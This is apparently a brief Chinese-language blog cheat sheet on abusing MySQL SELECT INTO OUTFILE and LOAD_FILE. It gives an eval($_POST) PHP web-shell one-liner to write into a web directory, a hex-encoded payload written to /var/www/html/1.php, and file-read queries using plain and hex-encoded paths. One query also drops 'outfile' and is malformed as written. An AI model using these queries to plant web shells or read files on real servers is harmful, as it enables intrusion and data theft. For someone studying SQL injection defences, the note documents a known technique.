mysql into outfile 和 load_file

基本语法 SELECT ‘<?php eval($_POST[‘fuck’])?>’ into outfile’某物理路径’

SELECT ‘hello world’ into outfile’d:\1.txt’ —->在d盘生成一个1.txt 里面是 hello world

SELECT ‘0x3c3f70687020706870696e666f28293b203f3e’ into ‘/var/www/html/1.php’ ,会在文件里写入phpinfo();

select load_file (“d:/1.txt”);显示1.txt里面的内容(也支持16进制)(单引号也可以)

select load_file (0x643a2f312e747874) (结果同上) (p.s. 用的是 bp里的ascii hex 转换)

发表评论

电子邮件地址不会被公开。 必填项已用*标注